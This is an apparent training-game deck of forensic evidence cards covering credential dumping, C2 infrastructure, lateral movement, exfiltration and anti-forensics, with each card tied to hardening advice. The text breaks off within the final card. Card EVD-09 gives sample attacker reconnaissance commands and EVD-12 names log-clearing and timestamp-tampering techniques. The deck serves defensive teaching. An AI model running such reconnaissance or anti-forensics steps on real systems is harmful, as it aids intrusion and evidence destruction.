Evidence Cards represent specific findings discovered during forensic investigations. They document what was found, how it was found, and what investigative leads it provides.

Findings Cards represent conclusions drawn from the evidence—these feed recommendations into Hardening, Network Building, and Audit modules.

Chain of Custody rule (v2.2): +5% Chain of Custody every time an Evidence card is discovered AND the team states how it was preserved (hash, imaging, log export); the TO may award +10% for exemplary handling. This stacks with any Chain of Custody impact printed on the card.

No Double Counting (v2.2): When an investigation discovers an Evidence card, apply ONLY the Evidence card's printed "Impact on Progress Meters" (plus the Chain of Custody handling bonus above). The investigation card's own advance line applies only when no Evidence card is produced (e.g., partial success).


Evidence Card Structure

Each Evidence Card includes: - Card ID: Unique identifier (EVD-01 through EVD-12) - Type: Category of evidence (Malware, Credentials, Movement, Exfiltration, Infrastructure, Timeline) - Title: Specific finding name - MITRE ATT&CK: Technique this evidence relates to - Description: What was found and where - Discovery Source: Which Investigation Action cards typically find this evidence - Chain of Custody: Admissibility rating (Strong/Moderate/Weak) - Investigative Lead: What the team can do next with this finding - Connection to Attack: Links to threat cards and attack phases


Evidence Cards (12 Total)

EVD-01: Credential Dumper Malware

╔════════════════════════════════════════════════════════════════╗
║              EVD-01: CREDENTIAL DUMPER MALWARE                 ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence                                    ║
║ MITRE ATT&CK: T1003 (OS Credential Dumping), T1556 (Modify Auth)║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Malware sample recovered from compromised system that dumps    ║
║ user credentials (SAM file, LSASS process, password hashes,    ║
║ or Kerberos tickets). Examples: Mimikatz, PwDump, LaZagne.     ║
║                                                                 ║
║ Where It Was Found:                                            ║
║ - In System32 directory (hidden with attributes)               ║
║ - In %Temp% directory (temporary staging)                      ║
║ - In admin user AppData (stealth installation)                 ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Attacker objective: Privilege escalation                     ║
║ - Persistence vector: Credential harvesting                    ║
║ - Attack phase: Privilege escalation → lateral movement        ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Binary file can be hashed (MD5, SHA-1, SHA-256)             ║
║ - File timestamps document creation/modification               ║
║ - Admissible in court with hash validation                     ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - DISK-01/DISK-02: Found as file artifact                      ║
║ - MEM-01/MEM-02: Found as running process in memory            ║
║ - MALW-01: Behavior shows credential dumping actions           ║
║ - MALW-02: Code analysis identifies dumping capabilities       ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We found a credential dumper. Let's analyze its behavior      ║
║ (MALW-01) to understand exactly what credentials were captured.║
║ Then we can assume those accounts are compromised."            ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +15% (shows escalation phase)                  ║
║ - Attribution: +10% (dumper choice shows attacker sophistication)║
║ - Timeline: +10% (timestamp shows when escalation occurred)    ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Implement credential guard to prevent dumping"   ║
║ → NETWORK BUILDING: "Isolate admin credentials in PAW"         ║
║ → AUDIT: "Verify controls around credential access logging"    ║
╚════════════════════════════════════════════════════════════════╝

EVD-02: Command-and-Control Callback Domain

╔════════════════════════════════════════════════════════════════╗
║              EVD-02: C2 CALLBACK DOMAIN                        ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Infrastructure                                    ║
║ MITRE ATT&CK: T1071 (Application Layer Protocol), T1573 (Encrypted║
║              Channel), T1008 (Fallback Channels)               ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Domain name or IP address that malware communicates with for   ║
║ command and control. Examples:                                 ║
║ - checkupdate.ru (looks legitimate but is attacker-controlled) ║
║ - 192.0.2.45 (direct IP address)                              ║
║                                                                 ║
║ Where It Was Found:                                            ║
║ - In malware strings (hardcoded in binary)                     ║
║ - In network traffic (outbound connections)                    ║
║ - In memory (communication buffers)                            ║
║ - In DNS logs (DNS queries)                                    ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Attacker still has access (if domain still active)           ║
║ - C2 infrastructure operator (may be reused for other campaigns)║
║ - Attack sophistication (legitimate-looking domain = higher skill║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Network logs document domain/IP communication                ║
║ - PCAP files timestamp the traffic                             ║
║ - DNS logs show query history                                  ║
║ - Admissible with supporting traffic analysis                  ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - MALW-01: Dynamic analysis shows C2 connections               ║
║ - MALW-02: Static analysis finds hardcoded domains             ║
║ - NET-01: Network traffic analysis identifies unusual domains  ║
║ - NET-02: Deep packet inspection reconstructs C2 commands      ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We found the C2 domain. Let's do THREAT-01 analysis to:       ║
║ - WHOIS lookup (registrant info)                               ║
║ - Historical DNS records (see past resolutions)                ║
║ - Infrastructure mapping (what else is hosted on this IP?)     ║
║ - Passive DNS (VirusTotal, Shodan, etc)"                       ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +15% (confirms persistence vector)             ║
║ - Attribution: +25% (infrastructure links to threat group)     ║
║ - Timeline: +5% (timestamps when C2 was active)                ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Block C2 domain via firewall, DNS sinkhole"      ║
║ → NETWORK BUILDING: "Implement egress filtering to C2 ranges"  ║
║ → AUDIT: "Review firewall rules for C2 domain blocking"        ║
║                                                                 ║
║ THREAT INTEL:                                                  ║
║ Can be shared with ISP/CISA for coordinated takedown/blocking. ║
╚════════════════════════════════════════════════════════════════╝

EVD-03: Persistence Mechanism (Scheduled Task)

╔════════════════════════════════════════════════════════════════╗
║              EVD-03: PERSISTENCE MECHANISM (SCHEDULED TASK)    ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence                                    ║
║ MITRE ATT&CK: T1053 (Scheduled Task/Job), T1543 (Create/Modify ║
║              System Process)                                   ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Scheduled task or cron job configured to execute malware at    ║
║ regular intervals (hourly, daily, on system startup). Ensures  ║
║ malware runs even if process is killed or system reboots.      ║
║                                                                 ║
║ Example:                                                       ║
║ - Task: "Windows_Update_Service" (disguised name)              ║
║ - Runs: System startup + every 4 hours                         ║
║ - Executes: C:\Windows\System32\msupd.exe (hidden location)    ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Attacker skill level (simple but effective)                  ║
║ - Intent: Long-term access/persistence                         ║
║ - Sophistication: Low-to-medium (persistence is basic)         ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Task definition stored in XML (Windows registry/filesystem)  ║
║ - Can be exported and hashed                                   ║
║ - Creation/modification timestamps available                   ║
║ - Fully admissible in court                                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - DISK-01: Task files in Windows registry/filesystem           ║
║ - LOG-01: Task execution appears in logs                       ║
║ - MEM-01: Task execution visible in running processes          ║
║ - MALW-01: Dynamic analysis shows task creation               ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We found a scheduled task executing malware. Key questions:   ║
║ - When was this task created? (timestamp analysis)             ║
║ - What executable does it run? (acquire and analyze - MALW-01) ║
║ - Is the executable still present? (filesystem search)         ║
║ - Is the task still active? (persistence threat)"              ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +20% (clearly shows persistence phase)         ║
║ - Timeline: +15% (task timestamps show when persistence installed)║
║ - Attribution: +5% (persistence technique is common)           ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Implement AppLocker/code signing for scheduled   ║
║              task executables"                                 ║
║ → NETWORK BUILDING: "Enable scheduled task logging and analysis"║
║ → AUDIT: "Verify controls on scheduled task creation"          ║
╚════════════════════════════════════════════════════════════════╝

EVD-04: Suspicious Admin Login (Timeline)

╔════════════════════════════════════════════════════════════════╗
║              EVD-04: SUSPICIOUS ADMIN LOGIN (TIMELINE)         ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Credentials & Access                                     ║
║ MITRE ATT&CK: T1078 (Valid Accounts), T1021 (Remote Services), ║
║              T1550 (Use Alternate Authentication Material)     ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Administrator account login with suspicious characteristics:   ║
║ - Unusual time (3 AM instead of business hours)                ║
║ - Unusual location (different country/VPN)                     ║
║ - Unusual source (remote desktop instead of VPN)               ║
║ - Batch processing (multiple logins in seconds)                ║
║                                                                 ║
║ Example Log Entry:                                             ║
║ 2024-10-15 03:22:15 - User: Administrator                      ║
║ Source: 192.0.2.100 (Russia)                                   ║
║ Protocol: RDP / SSH                                            ║
║ Success: Yes                                                   ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Credential compromise (credentials being used by attacker)   ║
║ - Privilege level compromised (admin account)                  ║
║ - Lateral movement likely (attacker on network now)            ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Log entry with timestamp and source                          ║
║ - digitally signed event log                                   ║
║ - Corroborated by other log sources                            ║
║ - Fully admissible in court                                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - LOG-01: Event Log Analysis shows unusual logon event         ║
║ - LOG-02: Correlation across multiple systems                  ║
║ - TIMELINE-01: Used to establish attack progression            ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "Admin account was compromised. Questions to answer:           ║
║ - When was the password changed? (before or after login?)      ║
║ - What other logins occurred after this? (lateral movement)    ║
║ - Was there any password reset? (attacker covering tracks)     ║
║ - What systems did this account access? (scope of compromise)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +20% (clear escalation point)                  ║
║ - Timeline: +25% (login timestamp anchors timeline)            ║
║ - Attribution: +10% (geolocation may hint at attacker origin)  ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Implement MFA on admin accounts"                 ║
║ → NETWORK BUILDING: "Isolate admin access to PAW"              ║
║ → AUDIT: "Review admin account access controls and logging"    ║
╚════════════════════════════════════════════════════════════════╝

EVD-05: Lateral Movement Evidence (Pass-the-Hash)

╔════════════════════════════════════════════════════════════════╗
║              EVD-05: LATERAL MOVEMENT (PASS-THE-HASH)          ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Lateral Movement                                         ║
║ MITRE ATT&CK: T1550 (Use Alternate Authentication Material),   ║
║              T1110 (Brute Force), T1021 (Remote Services)      ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Evidence that attacker used stolen password hashes to access   ║
║ other systems without knowing the plaintext password.          ║
║ NTLM hash reuse across systems allows lateral movement.        ║
║                                                                 ║
║ What It Shows:                                                 ║
║ - Compromised account: admin-user (hash: A1B2C3D4E5F6...)      ║
║ - Lateral targets: File server, database server, backup server ║
║ - Movement pattern: Sequential access across infrastructure    ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Attack sophistication (understanding Windows auth)           ║
║ - Network enumeration (attacker knew what systems exist)       ║
║ - Scope of compromise (multiple systems accessed)              ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠                                   ║
║ - Hash captured from memory/SAM file                           ║
║ - Corroborated by network logs (successful auth events)        ║
║ - Can be cryptographically validated                           ║
║ - Admissible with supporting evidence (network logs)           ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - LOG-02: Cross-system log correlation shows pattern           ║
║ - NET-01: Network traffic shows auth attempts                  ║
║ - MEM-01/MEM-02: Hash visible in memory                        ║
║ - DISK-01/DISK-02: SAM file contains hashes                    ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "Attacker used pass-the-hash technique. Next steps:            ║
║ - Determine all systems accessed with this hash                ║
║ - Check what actions were taken on each system                 ║
║ - Look for privilege escalation or data access on each system" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +25% (shows sophisticated lateral movement)    ║
║ - Timeline: +15% (timestamps show movement sequence)           ║
║ - Attribution: +15% (technique sophistication shows skill)     ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Implement Credential Guard, Mimikatz mitigations"║
║ → NETWORK BUILDING: "Network segmentation to limit lateral move"║
║ → AUDIT: "Verify Controls on credential reuse prevention"      ║
╚════════════════════════════════════════════════════════════════╝

EVD-06: Data Exfiltration Evidence

╔════════════════════════════════════════════════════════════════╗
║              EVD-06: DATA EXFILTRATION EVIDENCE                ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Exfiltration                                             ║
║ MITRE ATT&CK: T1020 (Automated Exfiltration), T1030 (Data      ║
║              Transfer Size Limits), T1048 (Exfil Over Alt      ║
║              Protocol)                                         ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Evidence of large data transfer from internal network to       ║
║ external attacker-controlled destination.                      ║
║                                                                 ║
║ Characteristics:                                               ║
║ - Volume: 100+ GB transferred in 6-hour window                 ║
║ - Timing: During non-business hours (3-8 AM)                   ║
║ - Destination: External IP/domain (attacker server)            ║
║ - Protocol: HTTPS, FTP, or custom protocol                     ║
║ - Pattern: Consistent data rate (not bandwidth-throttled)      ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Scope of compromise (what was accessed)                      ║
║ - Attacker objective (data theft vs. ransomware)               ║
║ - Attack timeline (when exfiltration occurred)                 ║
║ - Attacker infrastructure (location of receiving server)       ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Network flow logs (NetFlow, sFlow, or IDS logs)              ║
║ - PCAP files with packet timestamps                            ║
║ - Firewall logs documenting outbound connections               ║
║ - Cryptographic hashes of transferred data                     ║
║ - Fully admissible in court                                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - NET-01: Network traffic analysis shows volume anomalies      ║
║ - NET-02: Packet inspection shows data being transferred       ║
║ - LOG-02: Firewall/proxy logs show external connections        ║
║ - MALW-01: Dynamic analysis shows file staging before exfil   ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "Massive data exfiltration detected. Critical questions:       ║
║ - Exactly which files/databases were exfiltrated?              ║
║ - How many customer records are affected?                      ║
║ - Can we identify specific data types stolen?                  ║
║ - Is the data still being transferred (ongoing threat)?"       ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +20% (confirms attacker objectives)            ║
║ - Timeline: +20% (exfil duration/timing)                       ║
║ - Attribution: +10% (exfil infrastructure may be reused)       ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Data loss prevention (DLP) controls"             ║
║ → NETWORK BUILDING: "Egress filtering, traffic inspection"     ║
║ → DISASTER RECOVERY: "Breach notification scope (data volume)" ║
║ → AUDIT: "Data protection controls and encryption review"      ║
╚════════════════════════════════════════════════════════════════╝

EVD-07: Attacker Infrastructure Map

╔════════════════════════════════════════════════════════════════╗
║              EVD-07: ATTACKER INFRASTRUCTURE MAP               ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Infrastructure                                    ║
║ MITRE ATT&CK: Related to C2 infrastructure and command channels║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Connected map of attacker-controlled infrastructure including  ║
║ multiple domains, IP addresses, registrars, and services.      ║
║                                                                 ║
║ Example Infrastructure Web:                                    ║
║ - Primary C2: checkupdate.ru (IP: 192.0.2.45)                 ║
║ - Alternate C2: update-service.xyz (IP: 192.0.2.46)            ║
║ - Malware hosting: files.example.net (IP: 192.0.2.47)          ║
║ - Registrant: All registered via registrar.ru                  ║
║ - ASN: AS64512 (Ukrainian ISP network)                         ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Attacker operational security (multiple infrastructure) ■    ║
║ - Attacker resources (ISP relationships, hosting account)      ║
║ - Attacker location hints (registrar, ASN, geolocation)        ║
║ - Attack history (domains registered months/years earlier)     ║
║ - Other campaigns (infrastructure reused for other attacks)    ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠                                   ║
║ - WHOIS records are public but can be modified                 ║
║ - Historical DNS data from passive DNS services                ║
║ - Correlations need cross-referencing                          ║
║ - Admissible with supporting evidence (traffic logs)           ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - THREAT-01: Threat attribution analysis connects domains      ║
║ - MALW-02: Static analysis finds hardcoded backup domains      ║
║ - NET-01: Network traffic shows multiple C2 attempts           ║
║ - CTI research: VirusTotal, Shodan, Passive DNS services      ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We've mapped attacker infrastructure. Next steps:             ║
║ - Search threat intelligence databases for this infrastructure ║
║ - Look for connections to known threat groups                  ║
║ - Check if infrastructure used in other campaigns              ║
║ - Contact registrar and hosting for takedown                   ║
║ - Report to ISP for blocking/monitoring"                       ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attribution: +30% (infrastructure often linked to groups)    ║
║ - Attack Chain: +15% (understanding attacker preparation)      ║
║ - Timeline: +10% (infrastructure registration dates)           ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Block all known C2 infrastructure via firewall"  ║
║ → AUDIT: "Threat intelligence integration for blocking"        ║
║ → THREAT INTEL: Shareable with industry, law enforcement       ║
╚════════════════════════════════════════════════════════════════╝

EVD-08: Encryption Keys Recovered

╔════════════════════════════════════════════════════════════════╗
║              EVD-08: ENCRYPTION KEYS RECOVERED                 ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence                                    ║
║ MITRE ATT&CK: T1140 (Deobfuscate/Decode), T1552 (Unsecured    ║
║              Credentials), T1074 (Data Staged)                 ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Encryption keys recovered from memory, disk, or malware code   ║
║ that allow decryption of:                                      ║
║ - Malware traffic (C2 communications)                          ║
║ - Stolen data archives (what was exfiltrated)                  ║
║ - Attacker staging servers (accessing their infrastructure)    ║
║ - Backdoor communications (understanding commands)             ║
║                                                                 ║
║ Examples:                                                      ║
║ - AES-256 key found in malware binary                          ║
║ - RC4 key in process memory (used for C2)                      ║
║ - TLS certificates for backdoor listener                       ║
║ - Steganography keys (hidden messages in files)                ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Encryption strength (military-grade vs. basic obfuscation)   ║
║ - Attacker sophistication (poor key management = careless)     ║
║ - What data can be decrypted (scope of analysis)               ║
║ - Backdoor capabilities (understanding command set)            ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠                                   ║
║ - Keys extracted from memory/binary must be documented         ║
║ - Extraction methodology must be explained                     ║
║ - Cross-referencing with code/behavior confirms validity       ║
║ - Admissible with supporting analysis documentation            ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - MEM-02: Deep memory analysis finds encryption keys           ║
║ - DISK-02: File carving recovers keys from slack space         ║
║ - MALW-02: Static analysis finds hardcoded keys                ║
║ - MALW-01: Dynamic analysis reveals keys generated at runtime  ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We recovered encryption keys! This is huge because:           ║
║ - We can decrypt C2 communications (see commands sent)          ║
║ - We can decrypt malware archives (understand what was stolen) ║
║ - We can access attacker staging servers (more evidence)       ║
║ - We can build stronger attribution (command content)"         ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +25% (understand full communication)           ║
║ - Attribution: +20% (commands reveal attacker objectives)      ║
║ - Timeline: +15% (command history shows action sequence)       ║
║ - Chain of Custody: +15% (encryption is strong evidence)       ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Secure key management practices"                 ║
║ → AUDIT: "Encryption and key management controls"              ║
║ → THREAT INTEL: Keys shared with law enforcement               ║
╚════════════════════════════════════════════════════════════════╝

EVD-09: Attacker Command History

╔════════════════════════════════════════════════════════════════╗
║              EVD-09: ATTACKER COMMAND HISTORY                  ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity                                          ║
║ MITRE ATT&CK: T1059 (Command & Scripting Interpreter),         ║
║              T1059.001 (PowerShell)                            ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Recovered history of commands executed by attacker on          ║
║ compromised systems. Shows attacker's actions, objectives,     ║
║ and decision-making process.                                   ║
║                                                                 ║
║ Examples:                                                      ║
║ - PowerShell: Get-AdUser -Filter * | Export-CSV C:\temp\ad.csv ║
║ - CMD: dir \\backup-server\share                               ║
║ - Bash: find / -name "*.sql" -o -name "*.db" 2>/dev/null       ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Attacker objectives (looking for what? ad users? databases?) ║
║ - Attacker knowledge (familiar with Windows/Linux/networks)    ║
║ - Attack sophistication (script-kiddie vs. skilled operator)   ║
║ - Targeting specificity (random exploration vs. targeted search║
║ - Timeline of activities (sequence of commands shows progression)║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Command history from shell/terminal logs                     ║
║ - PowerShell transcript logs (if enabled)                      ║
║ - Memory forensics shows running command buffer                ║
║ - Timestamps document command execution order                  ║
║ - Fully admissible in court                                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - MEM-02: Memory forensics finds recent command buffer         ║
║ - LOG-02: Command execution logging (PowerShell, bash history) ║
║ - DISK-01: Shell history files (.bash_history, PowerShell logs)║
║ - MALW-01: Dynamic analysis shows commands sent to shell       ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We have the attacker's command history! This shows us:        ║
║ - What systems they were looking for                           ║
║ - What data they searched for                                  ║
║ - How much time they spent on each system                      ║
║ - When they pivoted to new systems                             ║
║ - When they started exfiltration                               ║
║ - If they set up backdoors or persistence"                     ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Timeline: +25% (command timing shows exact sequence)         ║
║ - Attack Chain: +25% (command progression shows phases)        ║
║ - Attribution: +15% (command style/language hints)             ║
║ - Chain of Custody: +10% (strong admissible evidence)          ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "PowerShell transcript logging, command audit"    ║
║ → AUDIT: "Verify logging of command execution"                 ║
║ → TRAINING: "Identify what commands should have triggered alerts"║
╚════════════════════════════════════════════════════════════════╝

EVD-10: Malware Behavior Profile

╔════════════════════════════════════════════════════════════════╗
║              EVD-10: MALWARE BEHAVIOR PROFILE                  ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence                                    ║
║ MITRE ATT&CK: Multiple TTPs based on observed behavior         ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Complete profile of malware capabilities and behavior based    ║
║ on dynamic analysis in sandbox environment.                    ║
║                                                                 ║
║ Profile Contents:                                              ║
║ - File system interactions (creates, modifies, deletes)        ║
║ - Registry modifications (persistence mechanisms)              ║
║ - Process creation (parent-child relationships)                ║
║ - Network communications (DNS queries, HTTP requests, IPs)     ║
║ - API calls (Windows/Linux API usage)                          ║
║ - Anti-analysis techniques (sandbox evasion)                   ║
║                                                                 ║
║ Example Output:                                                ║
║ - Name: conhost.exe (masquerading as Windows process)          ║
║ - Creates files: C:\Users\*\AppData\Local\Temp\app.exe         ║
║ - Registry: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ║
║   (persistence)                                                ║
║ - Network: Connects to update.badsite.ru:443 every 15 minutes  ║
║ - Capabilities: Credential harvesting, File encryption, C2    ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Complete malware capabilities                                ║
║ - Attacker operational techniques                              ║
║ - Threat level (spyware vs. ransomware vs. trojan)              ║
║ - Indicators of Compromise (IOCs)                              ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - Sandbox execution video/logs document behavior               ║
║ - Timestamps and sequence recorded                             ║
║ - Reproducible analysis methodology                            ║
║ - Widely accepted malware analysis evidence                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - MALW-01: Dynamic sandbox analysis produces full profile      ║
║ - MALW-02: Static analysis validates observed behaviors        ║
║ - Combined: Behavior validated against code confirms accuracy  ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "We have the complete malware profile. Now we can:             ║
║ - Search for all instances of this malware                     ║
║ - Hunt for C2 communications on network                        ║
║ - Search for created files and artifacts                       ║
║ - Link to other malware families (code similarities)"          ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +20% (understand capabilities = understand threat)║
║ - Attribution: +15% (malware signatures match known families)  ║
║ - Timeline: +10% (behavior timing shows operation phase)       ║
║ - Chain of Custody: +10% (sandbox logs are strong evidence)    ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Controls to prevent malware execution"           ║
║ → NETWORK BUILDING: "Detection of malware C2 behaviors"        ║
║ → AUDIT: "EDR/SIEM coverage for malware detection"             ║
╚════════════════════════════════════════════════════════════════╝

EVD-11: File Staging Artifacts

╔════════════════════════════════════════════════════════════════╗
║              EVD-11: FILE STAGING ARTIFACTS                    ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity                                          ║
║ MITRE ATT&CK: T1074 (Data Staged), T1005 (Data from Local      ║
║              System)                                           ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Evidence of attacker staging files before exfiltration. Files  ║
║ are collected in a temporary location, compressed, encrypted,  ║
║ then transferred to attacker server.                           ║
║                                                                 ║
║ Artifacts Found:                                               ║
║ - Compressed archives (RAR, 7z, ZIP files)                     ║
║ - Partially deleted files (overwrite artifacts)                ║
║ - File lists (text files naming what to steal)                 ║
║ - Batch scripts (automated collection scripts)                 ║
║ - Temporary directories with suspicious contents               ║
║                                                                 ║
║ Example:                                                       ║
║ - C:\Staging\data_backup.7z (500 MB)                           ║
║ - C:\Staging\files_to_get.txt (list of target files)           ║
║ - C:\Staging\collect.bat (automated collection script)         ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Data that was targeted (from .txt lists)                     ║
║ - Volume of exfiltration (archive size)                        ║
║ - Compression ratio (how much data actually stolen)            ║
║ - Attacker knowledge (knew where sensitive data was)           ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓                                     ║
║ - File hashes document the staging                             ║
║ - File timestamps show staging timeline                        ║
║ - File content confirms what was staged                        ║
║ - Fully admissible in court                                    ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source:                                              ║
║ - DISK-01/DISK-02: Staging artifacts on disk                   ║
║ - LOG-02: Batch script execution in logs                       ║
║ - MALW-01: Dynamic analysis shows staging process              ║
║ - NET-01: File transfer evidence (connection to staging dir)   ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead:                                            ║
║ "Attacker staged specific files. This shows:                   ║
║ - Exact data that was targeted (from staging lists)            ║
║ - Attack planning (targeted vs. random)                        ║
║ - Data sensitivity (what did they prioritize)                  ║
║ - Precision of attack (narrow vs. broad data grab)"            ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters:                                     ║
║ - Attack Chain: +15% (staging phase evidence)                  ║
║ - Timeline: +20% (staging timestamps show prep phase)          ║
║ - Attribution: +10% (precision shows targeting sophistication) ║
║ - Chain of Custody: +10% (file evidence is strong)             ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules:                                            ║
║ → HARDENING: "Data identification and protection (DLP)"        ║
║ → AUDIT: "Data classification and access controls"             ║
║ → NOTIFICATION: "Specific data breach notification"            ║
╚════════════════════════════════════════════════════════════════╝

EVD-12: Anti-Forensics Evidence

╔════════════════════════════════════════════════════════════════╗
║              EVD-12: ANTI-FORENSICS EVIDENCE                   ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity                                          ║
║ MITRE ATT&CK: T1070 (Indicator Removal), T1485 (Data           ║
║              Destruction), T1556 (Modify Authentication Process)║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION:                                                   ║
║ Evidence that attacker actively tried to cover their tracks    ║
║ using anti-forensics techniques.                               ║
║                                                                 ║
║ Anti-Forensics Found:                                          ║
║ - Event log deletion (Clear-EventLog PowerShell)               ║
║ - File timestamp manipulation (TimeStomp)                      ║
║ - Log overwriting (dd commands filling logs)                   ║
║ - File shredding (secure deletion of evidence)                 ║
║ - Registry clearing (CleanMgr, CCleaner, etc)                  ║
║ - Malware self-deletion after execution                        ║
║                                                                 ║
║ What It Reveals:                                               ║
║ - Sophistication (advanced attackers use anti-forensics)       ║
║ - Awareness (attacker knew forensics would be used)            ║
║ - Intent (intentional cover-up vs. accidental trail)           ║
║ - What they're hiding (deleted logs = they knew activities     ║
║   would be suspicious)                                         ║
║ - Attack planning (anti-forensics in playbook = pre-planned)   ║
